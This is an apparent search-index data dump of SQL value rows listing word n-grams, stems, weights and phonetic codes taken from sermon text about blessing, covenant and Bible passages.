(269755, 'put forth', 'put forth', 0, 1, 1.3, 'P3163', 1, '*'),
(269756, 'put forth effort', 'put forth effort', 0, 1, 1.5333, 'P3163163', 1, '*'),
(269757, 'recession', 'recess', 0, 0, 0.6, 'R250', 1, '*'),
(269758, 'recession we', 'recess we', 0, 1, 1.4, 'R250', 1, '*'),
(269759, 'recession we are', 'recess we are', 0, 1, 1.5333, 'R256', 1, '*'),
(269760, 'released in', 'releas in', 0, 1, 1.3667, 'R4235', 1, '*'),
(269761, 'released in words', 'releas in words', 0, 1, 1.5667, 'R4235632', 1, '*'),
(269762, 'remembers', 'rememb', 0, 0, 0.6, 'R5162', 1, '*'),
(269763, 'remembers covenant', 'rememb covenant', 0, 1, 1.6, 'R5162153', 1, '*'),
(269764, 'remembers covenant understand', 'rememb covenant understand', 0, 1, 1.9667, 'R51621535362353', 1, '*'),
(269765, 'required when', 'requir when', 0, 1, 1.4333, 'R2635', 1, '*'),
(269766, 'required when you', 'requir when you', 0, 1, 1.5667, 'R2635', 1, '*'),
(269767, 'response towards', 'respons towards', 0, 1, 1.5333, 'R21523632', 1, '*'),
(269768, 'response towards you', 'respons towards you', 0, 1, 1.6667, 'R21523632', 1, '*'),
(269769, 'sealed', 'seal', 0, 0, 0.4, 'S430', 2, '*'),
(269770, 'sealed in', 'seal in', 0, 1, 1.3, 'S435', 1, '*'),
(269771, 'sealed in the', 'seal in the', 0, 1, 1.4333, 'S4353', 1, '*'),
(269772, 'settle that', 'settl that', 0, 1, 1.3667, 'S343', 1, '*'),
(269773, 'settle that in', 'settl that in', 0, 1, 1.4667, 'S3435', 1, '*'),
(269774, 'simply means there', 'simpli means there', 0, 1, 1.6, 'S5145236', 1, '*'),
(269775, 'so don\'t', 'so don', 0, 1, 1.2667, 'S353', 3, '*'),
(269776, 'so don\'t be', 'so don be', 0, 1, 1.3667, 'S3531', 1, '*'),
(269777, 'something on', 'someth on', 0, 1, 1.4, 'S53525', 1, '*'),
(269778, 'something on your', 'someth on your', 0, 1, 1.5667, 'S535256', 1, '*'),
(269779, 'something that wraps', 'someth that wraps', 0, 1, 1.6667, 'S53523612', 1, '*'),
(269780, 'sometimes it', 'sometim it', 0, 1, 1.4, 'S53523', 1, '*'),
(269781, 'sometimes it can', 'sometim it can', 0, 1, 1.5333, 'S5352325', 1, '*'),
(269782, 'source lesser', 'sourc lesser', 0, 1, 1.4333, 'S62426', 1, '*'),
(269783, 'source lesser than', 'sourc lesser than', 0, 1, 1.6, 'S6242635', 1, '*'),
(269784, 'speak words', 'speak words', 0, 1, 1.3667, 'S12632', 1, '*'),
(269785, 'speak words that', 'speak words that', 0, 1, 1.5333, 'S126323', 1, '*'),
(269786, 'spirit load', 'spirit load', 0, 1, 1.3667, 'S16343', 1, '*'),
(269787, 'spirit load yourself', 'spirit load yourself', 0, 1, 1.6667, 'S163436241', 1, '*'),
(269788, 'stay balaam', 'stai balaam', 0, 1, 1.3667, 'S3145', 1, '*'),
(269789, 'stay balaam tried', 'stai balaam tried', 0, 1, 1.5667, 'S3145363', 1, '*'),
(269790, 'stay is', 'stai is', 0, 1, 1.2333, 'S320', 1, '*'),
(269791, 'stay is god', 'stai is god', 0, 1, 1.3667, 'S323', 1, '*'),
(269792, 'stay under', 'stai under', 0, 1, 1.3333, 'S3536', 1, '*'),
(269793, 'stay under the', 'stai under the', 0, 1, 1.4667, 'S35363', 1, '*'),
(269794, 'step into 2017', 'step into 2017', 0, 1, 1.4667, 'S3153', 1, '*'),
(269795, 'supernatural force', 'supernatur force', 0, 1, 1.6, 'S165364162', 1, '*'),
(269796, 'supernatural force sometimes', 'supernatur force sometimes', 0, 1, 1.9333, 'S1653641625352', 1, '*'),
(269797, 'supernatural influence', 'supernatur influence', 0, 1, 1.7333, 'S16536451452', 1, '*'),
(269798, 'supernatural influence the', 'supernatur influence the', 0, 1, 1.8667, 'S165364514523', 1, '*'),
(269799, 'sure mercies', 'sure mercies', 0, 1, 1.4, 'S6562', 1, '*'),
(269800, 'sure mercies of', 'sure mercies of', 0, 1, 1.5, 'S65621', 1, '*'),
(269801, 'sword', 'sword', 0, 0, 0.3333, 'S630', 2, '*'),
(269802, 'sword of', 'sword of', 0, 1, 1.2667, 'S631', 1, '*'),
(269803, 'sword of the', 'sword of the', 0, 1, 1.4, 'S6313', 1, '*'),
(269804, 'take a covenant', 'take a covenant', 0, 1, 1.5, 'T2153', 1, '*'),
(269805, 'take along as', 'take along as', 0, 1, 1.4333, 'T2452', 1, '*'),
(269806, 'taken their source', 'taken their source', 0, 1, 1.6, 'T2536262', 1, '*'),
(269807, 'than god', 'than god', 0, 1, 1.2667, 'T523', 1, '*'),
(269808, 'than god therefore', 'than god therefore', 0, 1, 1.6, 'T523616', 1, '*'),
(269809, 'than what is', 'than what is', 0, 1, 1.4, 'T532', 1, '*'),
(269810, 'that affect', 'that affect', 0, 1, 1.3667, 'T123', 1, '*'),
(269811, 'that affect men', 'that affect men', 0, 1, 1.5, 'T1235', 1, '*'),
(269812, 'that can curse', 'that can curse', 0, 1, 1.4667, 'T25262', 1, '*'),
(269813, 'that can speak', 'that can speak', 0, 1, 1.4667, 'T25212', 1, '*'),
(269814, 'that he gave', 'that he gave', 0, 1, 1.4, 'T210', 1, '*'),
(269815, 'that in', 'that in', 0, 1, 1.2333, 'T500', 3, '*'),
(269816, 'that in your', 'that in your', 0, 1, 1.4, 'T560', 1, '*'),
(269817, 'that the sure', 'that the sure', 0, 1, 1.4333, 'T260', 1, '*'),
(269818, 'that wraps', 'that wraps', 0, 1, 1.3333, 'T612', 1, '*'),
(269819, 'that wraps itself', 'that wraps itself', 0, 1, 1.5667, 'T6123241', 1, '*'),
(269820, 'the best of', 'the best of', 0, 1, 1.3667, 'T1231', 1, '*'),
(269821, 'the blessing affects', 'the blessing affects', 0, 1, 1.6667, 'T142521232', 1, '*'),
(269822, 'the blessing and', 'the blessing and', 0, 1, 1.5333, 'T1425253', 1, '*'),
(269823, 'the blessing is', 'the blessing is', 0, 1, 1.5, 'T14252', 1, '*'),
(269824, 'the blessing we', 'the blessing we', 0, 1, 1.5, 'T14252', 1, '*'),
(269825, 'the blessing you', 'the blessing you', 0, 1, 1.5333, 'T14252', 1, '*'),
(269826, 'the curse we', 'the curse we', 0, 1, 1.4, 'T262', 1, '*'),
(269827, 'the enemy picks', 'the enemy picks', 0, 1, 1.5, 'T512', 1, '*'),
(269828, 'the problem to', 'the problem to', 0, 1, 1.4667, 'T161453', 1, '*'),
(269829, 'the recession', 'the recession', 0, 1, 1.4333, 'T625', 1, '*'),
(269830, 'the recession we', 'the recession we', 0, 1, 1.5333, 'T625', 1, '*'),
(269831, 'the spirit load', 'the spirit load', 0, 1, 1.5, 'T216343', 1, '*'),
(269832, 'the sure', 'the sure', 0, 1, 1.2667, 'T260', 1, '*'),
(269833, 'the sure mercies', 'the sure mercies', 0, 1, 1.5333, 'T26562', 1, '*'),
(269834, 'the sword', 'the sword', 0, 1, 1.3, 'T263', 1, '*'),
(269835, 'the sword of', 'the sword of', 0, 1, 1.4, 'T2631', 1, '*'),
(269836, 'the wrong candidate', 'the wrong candidate', 0, 1, 1.6333, 'T65253', 1, '*'),
(269837, 'the year', 'the year', 0, 1, 1.2667, 'T600', 2, '*'),
(269838, 'the year whatever', 'the year whatever', 0, 1, 1.5667, 'T6316', 1, '*'),
(269839, 'their source', 'their source', 0, 1, 1.4, 'T6262', 1, '*'),
(269840, 'their source lesser', 'their source lesser', 0, 1, 1.6333, 'T6262426', 1, '*'),
(269841, 'there any', 'there any', 0, 1, 1.3, 'T650', 1, '*'),
(269842, 'there any divination', 'there any divination', 0, 1, 1.6667, 'T6531535', 1, '*'),
(269843, 'there are only', 'there are only', 0, 1, 1.4667, 'T654', 1, '*'),
(269844, 'therefore it', 'therefor it', 0, 1, 1.4, 'T6163', 2, '*'),
(269845, 'therefore it cannot', 'therefor it cannot', 0, 1, 1.6333, 'T6163253', 1, '*'),
(269846, 'they were a', 'thei were a', 0, 1, 1.3667, 'T600', 1, '*'),
(269847, 'this planet', 'thi planet', 0, 1, 1.3667, 'T21453', 1, '*'),
(269848, 'this planet you', 'thi planet you', 0, 1, 1.5, 'T21453', 1, '*'),
(269849, 'this year 4', 'thi year 4', 0, 1, 1.3667, 'T260', 1, '*'),
(269850, 'to be blessed', 'to be blessed', 0, 1, 1.4333, 'T1423', 1, '*'),
(269851, 'to be favourable', 'to be favourable', 0, 1, 1.5333, 'T1614', 1, '*'),
(269852, 'to curse you', 'to curse you', 0, 1, 1.4, 'T262', 1, '*'),
(269853, 'to david is', 'to david is', 0, 1, 1.3667, 'T132', 1, '*'),
(269854, 'to enjoy this', 'to enjoy this', 0, 1, 1.4333, 'T5232', 1, '*'),
(269855, 'to fight for', 'to fight for', 0, 1, 1.4, 'T12316', 1, '*'),
(269856, 'to settle', 'to settle', 0, 1, 1.3, 'T234', 1, '*'),
(269857, 'to settle that', 'to settle that', 0, 1, 1.4667, 'T2343', 1, '*'),
(269858, 'today there', 'todai there', 0, 1, 1.3667, 'T600', 2, '*'),
(269859, 'today there are', 'todai there are', 0, 1, 1.5, 'T600', 2, '*'),
(269860, 'towards you and', 'toward you and', 0, 1, 1.5, 'T63253', 1, '*'),
(269861, 'towards your', 'toward your', 0, 1, 1.4, 'T6326', 1, '*'),
(269862, 'towards your outcome', 'toward your outcome', 0, 1, 1.6667, 'T6326325', 1, '*'),
(269863, 'tried', 'tri', 0, 0, 0.3333, 'T630', 2, '*'),
(269864, 'tried it', 'tri it', 0, 1, 1.2667, 'T630', 1, '*'),
(269865, 'tried it against', 'tri it against', 0, 1, 1.5333, 'T632523', 1, '*'),
(269866, 'two ways', 'two ways', 0, 1, 1.2667, 'T200', 1, '*'),
(269867, 'two ways that', 'two ways that', 0, 1, 1.4333, 'T230', 1, '*'),
(269868, 'under the blessing', 'under the blessing', 0, 1, 1.6, 'U536314252', 1, '*'),
(269869, 'understand you', 'understand you', 0, 1, 1.4667, 'U5362353', 1, '*'),
(269870, 'understand you are', 'understand you are', 0, 1, 1.6, 'U53623536', 1, '*'),
(269871, 'upward till', 'upward till', 0, 1, 1.3667, 'U1634', 1, '*'),
(269872, 'upward till next', 'upward till next', 0, 1, 1.5333, 'U1634523', 1, '*'),
(269873, 'us to enjoy', 'us to enjoy', 0, 1, 1.3667, 'U2352', 1, '*'),
(269874, 'we are blessed', 'we are blessed', 0, 1, 1.4667, 'W61423', 1, '*'),
(269875, 'were a', 'were a', 0, 1, 1.2, 'W600', 1, '*'),
(269876, 'were a people', 'were a people', 0, 1, 1.4333, 'W614', 1, '*'),
(269877, 'what he calls', 'what he calls', 0, 1, 1.4333, 'W3242', 1, '*'),
(269878, 'what is required', 'what is required', 0, 1, 1.5333, 'W326263', 1, '*'),
(269879, 'whatever your', 'whatev your', 0, 1, 1.4333, 'W316', 2, '*'),
(269880, 'whatever your work', 'whatev your work', 0, 1, 1.6, 'W3162', 1, '*'),
(269881, 'when you put', 'when you put', 0, 1, 1.4, 'W513', 1, '*'),
(269882, 'whether it\'s', 'whether it', 0, 1, 1.4, 'W3632', 1, '*'),
(269883, 'whether it\'s released', 'whether it released', 0, 1, 1.7, 'W36326423', 1, '*'),
(269884, 'will not allow', 'will not allow', 0, 1, 1.4667, 'W4534', 1, '*'),
(269885, 'will stay', 'will stay', 0, 1, 1.3, 'W423', 1, '*'),
(269886, 'will stay is', 'will stay is', 0, 1, 1.4, 'W4232', 1, '*'),
(269887, 'win withjesus', 'win withjesus', 0, 1, 1.4333, 'W532', 1, '*'),
(269888, 'win withjesus god\'s', 'win withjesus god', 0, 1, 1.6333, 'W53232', 1, '*'),
(269889, 'with god 3', 'with god 3', 0, 1, 1.3333, 'W323', 1, '*'),
(269890, 'with words', 'with words', 0, 1, 1.3333, 'W3632', 1, '*'),
(269891, 'with words from', 'with words from', 0, 1, 1.5, 'W3632165', 1, '*'),
(269892, 'withjesus', 'withjesu', 0, 0, 0.6, 'W320', 1, '*'),
(269893, 'withjesus god\'s', 'withjesu god', 0, 1, 1.5, 'W3232', 1, '*'),
(269894, 'withjesus god\'s servant', 'withjesu god servant', 0, 1, 1.7667, 'W32326153', 1, '*'),
(269895, 'words but whether', 'word but whether', 0, 1, 1.5667, 'W632136', 1, '*'),
(269896, 'words from', 'word from', 0, 1, 1.3333, 'W632165', 1, '*'),
(269897, 'words from god', 'word from god', 0, 1, 1.4667, 'W63216523', 1, '*'),
(269898, 'words or', 'word or', 0, 1, 1.2667, 'W6326', 1, '*'),
(269899, 'words or provoked', 'word or provoked', 0, 1, 1.5667, 'W632616123', 1, '*'),
(269900, 'words that affect', 'word that affect', 0, 1, 1.5667, 'W6323123', 1, '*'),
(269901, 'work is a', 'work is a', 0, 1, 1.3, 'W620', 1, '*'),
(269902, 'work on this', 'work on this', 0, 1, 1.4, 'W62532', 1, '*'),
(269903, 'wraps', 'wrap', 0, 0, 0.3333, 'W612', 1, '*'),
(269904, 'wraps itself', 'wrap itself', 0, 1, 1.4, 'W6123241', 1, '*'),
(269905, 'wraps itself around', 'wrap itself around', 0, 1, 1.6333, 'W6123241653', 1, '*'),
(269906, 'written over', 'written over', 0, 1, 1.4, 'W63516', 1, '*'),
(269907, 'written over your', 'written over your', 0, 1, 1.5667, 'W63516', 1, '*'),
(269908, 'wrong candidate', 'wrong candidate', 0, 1, 1.5, 'W65253', 1, '*'),
(269909, 'wrong candidate to', 'wrong candidate to', 0, 1, 1.6, 'W65253', 1, '*'),
(269910, 'year 4', 'year 4', 0, 1, 1.2, 'Y600', 1, '*'),
(269911, 'year 4 the', 'year 4 the', 0, 1, 1.3333, 'Y630', 1, '*'),
(269912, 'year whatever', 'year whatever', 0, 1, 1.4333, 'Y6316', 1, '*'),
(269913, 'year whatever your', 'year whatever your', 0, 1, 1.6, 'Y6316', 1, '*'),
(269914, 'you and causes', 'you and causes', 0, 1, 1.4667, 'Y532', 1, '*'),
(269915, 'you and changes', 'you and changes', 0, 1, 1.5, 'Y53252', 1, '*'),
(269916, 'you and god', 'you and god', 0, 1, 1.3667, 'Y5323', 1, '*'),
(269917, 'you and it', 'you and it', 0, 1, 1.3333, 'Y530', 1, '*'),
(269918, 'you every other', 'you every other', 0, 1, 1.5, 'Y1636', 1, '*'),
(269919, 'you he has', 'you he has', 0, 1, 1.3333, 'Y200', 1, '*'),
(269920, 'you must come', 'you must come', 0, 1, 1.4333, 'Y52325', 1, '*'),
(269921, 'you neither', 'you neither', 0, 1, 1.3667, 'Y536', 1, '*'),
(269922, 'you neither is', 'you neither is', 0, 1, 1.4667, 'Y5362', 1, '*'),
(269923, 'you put forth', 'you put forth', 0, 1, 1.4333, 'Y13163', 1, '*'),
(269924, 'you step', 'you step', 0, 1, 1.2667, 'Y231', 1, '*'),
(269925, 'you step into', 'you step into', 0, 1, 1.4333, 'Y23153', 1, '*'),
(269926, 'you work', 'you work', 0, 1, 1.2667, 'Y620', 1, '*'),
(269927, 'you work on', 'you work on', 0, 1, 1.3667, 'Y625', 1, '*'),
(269928, 'you.”', 'you.”', 0, 0, 0.3333, 'Y000', 2, '*'),
(269929, 'you.” you', 'you.” you', 0, 1, 1.3, 'Y000', 1, '*'),
(269930, 'you.” you are', 'you.” you are', 0, 1, 1.4333, 'Y600', 1, '*'),
(269931, 'your action', 'your action', 0, 1, 1.3667, 'Y6235', 1, '*'),
(269932, 'your action it\'s', 'your action it', 0, 1, 1.5333, 'Y623532', 1, '*'),
(269933, 'your atmosphere', 'your atmosphere', 0, 1, 1.5, 'Y635216', 1, '*'),
(269934, 'your atmosphere the', 'your atmosphere the', 0, 1, 1.6333, 'Y6352163', 1, '*'),
(269935, 'your life “surely', 'your life “surely', 0, 1, 1.5667, 'Y641264', 1, '*'),
(269936, 'your outcome', 'your outcome', 0, 1, 1.4, 'Y6325', 1, '*'),
(269937, 'your outcome when', 'your outcome when', 0, 1, 1.5667, 'Y6325', 1, '*'),
(269938, 'your work is', 'your work is', 0, 1, 1.4, 'Y620', 1, '*'),
(269939, 'yourself with words', 'yourself with words', 0, 1, 1.6333, 'Y62413632', 1, '*'),
(269940, '“surely', '“sure', 0, 0, 0.4667, '“264', 1, '*'),
(269941, '“surely there', '“sure there', 0, 1, 1.4333, '“26436', 1, '*'),
(269942, '“surely there is', '“sure there is', 0, 1, 1.5333, '“264362', 1, '*'),
(270407, '1 35-42', '1 35-42', 0, 1, 1.2333, '', 1, '*'),
(270408, '1 35-42 a', '1 35-42 a', 0, 1, 1.3, 'A000', 1, '*'),
(270409, '1 kings', '1 kings', 0, 1, 1.2333, 'K520', 1, '*'),
(270410, '1 kings 6', '1 kings 6', 0, 1, 1.3, 'K520', 1, '*'),
(270411, '1 kings 8', '1 kings 8', 0, 1, 1.3, 'K520', 1, '*'),
(270412, '1 prayers', '1 prayers', 0, 1, 1.3, 'P620', 1, '*'),
(270413, '1 prayers luke', '1 prayers luke', 0, 1, 1.4667, 'P6242', 1, '*'),
(270414, '1-2 activities', '1-2 activities', 0, 1, 1.4667, 'A23132', 1, '*'),
(270415, '1-2 activities are', '1-2 activities are', 0, 1, 1.6, 'A231326', 1, '*'),
(270416, '1-3 the', '1-3 the', 0, 1, 1.2333, 'T000', 1, '*'),
(270417, '1-3 the elders', '1-3 the elders', 0, 1, 1.4667, 'T4362', 1, '*'),
(270418, '1-6 2', '1-6 2', 0, 1, 1.1667, '', 1, '*'),
(270419, '1-6 2 samuel', '1-6 2 samuel', 0, 1, 1.4, 'S540', 1, '*'),
(270420, '10 10', '10 10', 0, 1, 1.1667, '', 1, '*'),
(270421, '10 10 when', '10 10 when', 0, 1, 1.3333, 'W500', 1, '*'),
(270422, '10 when', '10 when', 0, 1, 1.2333, 'W500', 1, '*'),
(270423, '10 when god', '10 when god', 0, 1, 1.3667, 'W523', 1, '*'),
(270424, '10-11', '10-11', 0, 0, 0.5, '', 1, '*'),
(270425, '10-11 genesis', '10-11 genesis', 0, 1, 1.4333, 'G520', 1, '*'),
(270426, '10-11 genesis 26', '10-11 genesis 26', 0, 1, 1.5333, 'G520', 1, '*'),
(270427, '10-12 god', '10-12 god', 0, 1, 1.3, 'G300', 1, '*'),
(270428, '10-12 god rewards', '10-12 god rewards', 0, 1, 1.5667, 'G3632', 1, '*'),
(270429, '13 6-9', '13 6-9', 0, 1, 1.2, '', 1, '*'),
(270430, '13 6-9 john', '13 6-9 john', 0, 1, 1.3667, 'J500', 1, '*'),
(270431, '14-30', '14-30', 0, 0, 0.5, '', 1, '*'),
(270432, '14-30 saul\'s', '14-30 saul', 0, 1, 1.4, 'S420', 1, '*'),
(270433, '14-30 saul\'s armour', '14-30 saul armour', 0, 1, 1.6333, 'S42656', 1, '*'),
(270434, '14-30 you', '14-30 you', 0, 1, 1.3, 'Y000', 1, '*'),
(270435, '14-30 you will', '14-30 you will', 0, 1, 1.4667, 'Y400', 1, '*'),
(270436, '15 1-2', '15 1-2', 0, 1, 1.2, '', 1, '*'),
(270437, '15 1-2 activities', '15 1-2 activities', 0, 1, 1.5667, 'A23132', 1, '*'),
(270438, '15 1-6', '15 1-6', 0, 1, 1.2, '', 1, '*'),
(270439, '15 1-6 2', '15 1-6 2', 0, 1, 1.2667, '', 1, '*'),
(270440, '15 4-5', '15 4-5', 0, 1, 1.2, '', 1, '*'),
(270441, '15 4-5 this', '15 4-5 this', 0, 1, 1.3667, 'T200', 1, '*'),
(270442, '15 8', '15 8', 0, 1, 1.1333, '', 1, '*'),
(270443, '15 8 16', '15 8 16', 0, 1, 1.2333, '', 1, '*'),
(270444, '16 10-12', '16 10-12', 0, 1, 1.2667, '', 1, '*'),
(270445, '16 10-12 god', '16 10-12 god', 0, 1, 1.4, 'G300', 1, '*'),
(270446, '16 matthew', '16 matthew', 0, 1, 1.3333, 'M300', 1, '*'),
(270447, '16 matthew 25', '16 matthew 25', 0, 1, 1.4333, 'M300', 1, '*'),
(270448, '16-24', '16-24', 0, 0, 0.5, '', 1, '*'),
(270449, '16-24 mark', '16-24 mark', 0, 1, 1.3333, 'M620', 1, '*'),
(270450, '16-24 mark 1', '16-24 mark 1', 0, 1, 1.4, 'M620', 1, '*'),
(270451, '17 becoming', '17 becoming', 0, 1, 1.3667, 'B252', 1, '*'),
(270452, '17 becoming an', '17 becoming an', 0, 1, 1.4667, 'B2525', 1, '*'),
(270453, '18 18-absalom', '18 18-absalom', 0, 1, 1.4333, 'A1245', 1, '*'),
(270454, '18 18-absalom stole', '18 18-absalom stole', 0, 1, 1.6333, 'A1245234', 1, '*'),
(270455, '18-absalom', '18-absalom', 0, 0, 0.6667, 'A1245', 1, '*'),
(270456, '18-absalom stole', '18-absalom stole', 0, 1, 1.5333, 'A1245234', 1, '*'),
(270457, '18-absalom stole the', '18-absalom stole the', 0, 1, 1.6667, 'A12452343', 1, '*'),
(270458, '18-isaac', '18-isaac', 0, 0, 0.5333, 'I200', 1, '*'),
(270459, '18-isaac did', '18-isaac did', 0, 1, 1.4, 'I230', 1, '*'),
(270460, '18-isaac did not', '18-isaac did not', 0, 1, 1.5333, 'I2353', 1, '*'),
(270461, '19 1', '19 1', 0, 1, 1.1333, '', 1, '*'),
(270462, '19 1 kings', '19 1 kings', 0, 1, 1.3333, 'K520', 1, '*'),
(270463, '19 20-24', '19 20-24', 0, 1, 1.2667, '', 1, '*'),
(270464, '19 20-24 even', '19 20-24 even', 0, 1, 1.4333, 'E150', 1, '*'),
(270465, '19-21 2', '19-21 2', 0, 1, 1.2333, '', 1, '*'),
(270466, '19-21 2 faithfulness', '19-21 2 faithfulness', 0, 1, 1.6667, 'F31452', 1, '*'),
(270467, '2 faithfulness', '2 faithfulness', 0, 1, 1.4667, 'F31452', 1, '*'),
(270468, '2 faithfulness not', '2 faithfulness not', 0, 1, 1.6, 'F3145253', 1, '*'),
(270469, '2 samuel 15', '2 samuel 15', 0, 1, 1.3667, 'S540', 1, '*'),
(270470, '2 samuel 18', '2 samuel 18', 0, 1, 1.3667, 'S540', 1, '*'),
(270471, '2 samuel 5', '2 samuel 5', 0, 1, 1.3333, 'S540', 1, '*'),
(270472, '20-24', '20-24', 0, 0, 0.5, '', 1, '*'),
(270473, '20-24 even', '20-24 even', 0, 1, 1.3333, 'E150', 1, '*'),
(270474, '20-24 even jesus', '20-24 even jesus', 0, 1, 1.5333, 'E152', 1, '*'),
(270475, '24 3', '24 3', 0, 1, 1.1333, '', 1, '*'),
(270476, '24 3 eccl', '24 3 eccl', 0, 1, 1.3, 'E240', 1, '*'),
(270477, '24 45-47', '24 45-47', 0, 1, 1.2667, '', 1, '*'),
(270478, '24 45-47 luke', '24 45-47 luke', 0, 1, 1.4333, 'L200', 1, '*'),
(270479, '25 14-30', '25 14-30', 0, 1, 1.2667, '', 1, '*'),
(270480, '25 14-30 saul\'s', '25 14-30 saul', 0, 1, 1.5, 'S420', 1, '*'),
(270481, '25 14-30 you', '25 14-30 you', 0, 1, 1.4, 'Y000', 1, '*'),
(270482, '26 18-isaac', '26 18-isaac', 0, 1, 1.3667, 'I200', 1, '*'),
(270483, '26 18-isaac did', '26 18-isaac did', 0, 1, 1.5, 'I230', 1, '*'),
(270484, '28 19', '28 19', 0, 1, 1.1667, '', 1, '*'),
(270485, '28 19 1', '28 19 1', 0, 1, 1.2333, '', 1, '*'),
(270486, '3 eccl', '3 eccl', 0, 1, 1.2, 'E240', 1, '*'),
(270487, '3 eccl 10', '3 eccl 10', 0, 1, 1.3, 'E240', 1, '*'),
(270488, '3 wisdom', '3 wisdom', 0, 1, 1.2667, 'W235', 1, '*'),
(270489, '3 wisdom proverbs', '3 wisdom proverbs', 0, 1, 1.5667, 'W235161612', 1, '*'),
(270490, '31-37', '31-37', 0, 0, 0.5, '', 1, '*'),
(270491, '31-37 to', '31-37 to', 0, 1, 1.2667, 'T000', 1, '*'),
(270492, '31-37 to bring', '31-37 to bring', 0, 1, 1.4667, 'T1652', 1, '*'),
(270493, '35-42', '35-42', 0, 0, 0.5, '', 1, '*'),
(270494, '35-42 a', '35-42 a', 0, 1, 1.2333, 'A000', 1, '*'),
(270495, '35-42 a major', '35-42 a major', 0, 1, 1.4333, 'A526', 1, '*'),
(270496, '38 1', '38 1', 0, 1, 1.1333, '', 1, '*'),
(270497, '38 1 kings', '38 1 kings', 0, 1, 1.3333, 'K520', 1, '*'),
(270498, '4 31-37', '4 31-37', 0, 1, 1.2333, '', 1, '*'),
(270499, '4 31-37 to', '4 31-37 to', 0, 1, 1.3333, 'T000', 1, '*'),
(270500, '4 intimacy', '4 intimacy', 0, 1, 1.3333, 'I5352', 1, '*'),
(270501, '4 intimacy with', '4 intimacy with', 0, 1, 1.5, 'I53523', 1, '*'),
(270502, '4-5 this', '4-5 this', 0, 1, 1.2667, 'T200', 1, '*'),
(270503, '4-5 this will', '4-5 this will', 0, 1, 1.4333, 'T240', 1, '*'),
(270504, '45-47', '45-47', 0, 0, 0.5, '', 1, '*'),
(270505, '45-47 luke', '45-47 luke', 0, 1, 1.3333, 'L200', 1, '*'),
(270506, '45-47 luke 16', '45-47 luke 16', 0, 1, 1.4333, 'L200', 1, '*'),
(270507, '5 1-3', '5 1-3', 0, 1, 1.1667, '', 1, '*'),
(270508, '5 1-3 the', '5 1-3 the', 0, 1, 1.3, 'T000', 1, '*'),
(270509, '5 16-24', '5 16-24', 0, 1, 1.2333, '', 1, '*'),
(270510, '5 16-24 mark', '5 16-24 mark', 0, 1, 1.4, 'M620', 1, '*'),
(270511, '5 19-21 2', '5 19-21 2', 0, 1, 1.3, '', 1, '*'),
(270512, '5 be', '5 be', 0, 1, 1.1333, 'B000', 1, '*'),
(270513, '5 be a', '5 be a', 0, 1, 1.2, 'B000', 1, '*'),
(270514, '6 38', '6 38', 0, 1, 1.1333, '', 1, '*'),
(270515, '6 38 1', '6 38 1', 0, 1, 1.2, '', 1, '*'),
(270516, '6 do', '6 do', 0, 1, 1.1333, 'D000', 1, '*'),
(270517, '6 do assignments', '6 do assignments', 0, 1, 1.5333, 'D2532', 1, '*'),
(270518, '6-9', '6-9', 0, 0, 0.3, '', 1, '*'),
(270519, '6-9 john', '6-9 john', 0, 1, 1.2667, 'J500', 1, '*'),
(270520, '6-9 john 15', '6-9 john 15', 0, 1, 1.3667, 'J500', 1, '*'),
(270521, '8 10-11', '8 10-11', 0, 1, 1.2333, '', 1, '*'),
(270522, '8 10-11 genesis', '8 10-11 genesis', 0, 1, 1.5, 'G520', 1, '*'),
(270523, '8 16', '8 16', 0, 1, 1.1333, '', 1, '*'),
(270524, '8 16 matthew', '8 16 matthew', 0, 1, 1.4, 'M300', 1, '*'),
(270525, 'a christian with', 'a christian with', 0, 1, 1.5333, 'A262353', 1, '*'),
(270526, 'a committee', 'a committee', 0, 1, 1.3667, 'A253', 1, '*'),
(270527, 'a committee or', 'a committee or', 0, 1, 1.4667, 'A2536', 1, '*'),
(270528, 'a destiny', 'a destiny', 0, 1, 1.3, 'A3235', 1, '*'),
(270529, 'a destiny formation', 'a destiny formation', 0, 1, 1.6333, 'A323516535', 1, '*'),
(270530, 'a fig', 'a fig', 0, 1, 1.1667, 'A120', 1, '*'),
(270531, 'a fig tree', 'a fig tree', 0, 1, 1.3333, 'A1236', 1, '*'),
(270532, 'a major miracle', 'a major miracle', 0, 1, 1.5, 'A5265624', 1, '*'),
(270533, 'a monument', 'a monument', 0, 1, 1.3333, 'A530', 1, '*'),
(270534, 'a monument for', 'a monument for', 0, 1, 1.4667, 'A5316', 1, '*'),
(270535, 'a reaper', 'a reaper', 0, 1, 1.2667, 'A616', 1, '*'),
(270536, 'a reaper in', 'a reaper in', 0, 1, 1.3667, 'A6165', 1, '*'),
(270537, 'a replaceable', 'a replaceable', 0, 1, 1.4333, 'A614214', 1, '*'),
(270538, 'a replaceable material', 'a replaceable material', 0, 1, 1.7333, 'A6142145364', 1, '*'),
(270539, 'a replacement', 'a replacement', 0, 1, 1.4333, 'A614253', 1, '*'),
(270540, 'a replacement for', 'a replacement for', 0, 1, 1.5667, 'A61425316', 1, '*'),
(270541, 'a solomon', 'a solomon', 0, 1, 1.3, 'A245', 1, '*'),
(270542, 'a solomon and', 'a solomon and', 0, 1, 1.4333, 'A2453', 1, '*'),
(270543, 'a strange', 'a strange', 0, 1, 1.3, 'A23652', 1, '*'),
(270544, 'a strange son', 'a strange son', 0, 1, 1.4333, 'A236525', 1, '*'),
(270545, 'a title', 'a title', 0, 1, 1.2333, 'A340', 1, '*'),
(270546, 'a title but', 'a title but', 0, 1, 1.3667, 'A3413', 1, '*'),
(270547, 'ability and', 'abil and', 0, 1, 1.3667, 'A14353', 1, '*'),
(270548, 'ability and potentials', 'abil and potentials', 0, 1, 1.7333, 'A14353135342', 1, '*'),
(270549, 'ability that', 'abil that', 0, 1, 1.4, 'A143', 1, '*'),
(270550, 'ability that makes', 'abil that makes', 0, 1, 1.6, 'A14352', 1, '*'),
(270551, 'able to bring', 'abl to bring', 0, 1, 1.4333, 'A1431652', 1, '*'),
(270552, 'about the harvest', 'about the harvest', 0, 1, 1.5667, 'A136123', 1, '*'),
(270553, 'about the kind', 'about the kind', 0, 1, 1.4667, 'A13253', 1, '*'),
(270554, 'absalom in', 'absalom in', 0, 1, 1.3333, 'A1245', 1, '*'),
(270555, 'absalom in your', 'absalom in your', 0, 1, 1.5, 'A12456', 1, '*'),
(270556, 'accuracy knowing', 'accuraci knowing', 0, 1, 1.5333, 'A26252', 1, '*'),
(270557, 'accuracy knowing the', 'accuraci knowing the', 0, 1, 1.6667, 'A262523', 1, '*'),
(270558, 'activities are', 'activ are', 0, 1, 1.4667, 'A231326', 1, '*'),
(270559, 'activities are what', 'activ are what', 0, 1, 1.6333, 'A2313263', 1, '*'),
